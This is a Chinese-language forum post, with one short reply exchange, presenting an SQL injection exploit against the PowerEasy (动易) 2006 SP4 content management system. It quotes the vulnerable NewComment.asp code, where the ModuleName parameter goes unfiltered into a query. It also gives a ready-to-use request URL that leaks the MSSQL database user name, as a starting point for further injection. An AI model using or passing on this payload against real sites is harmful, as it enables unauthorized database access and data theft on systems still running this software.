动易2006SP4的漏洞利用
今天BCT把动易SP4的漏洞公布了,既然都公布了,那么还是发出来吧!<BR>在NewComment.asp文件中<DIV>ModuleName = Trim(request("ModuleName"))</DIV>这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的<BR>SQL语句
<DIV>If ModuleName <> "" Then<BR> If ChannelID <> 0 Then<BR> If ClassID <> 0 Then<BR> sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True<BR><BR>sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1</DIV>在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。)
<DIV>NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--</DIV>例如这样就可以暴mssql用户名<BR>省下的就是sql注入了
re:动易2006SP4的漏洞利用
<P>老大,还有更加详细的吗?</P><P>这个自己都有啊</P>
页:
[1]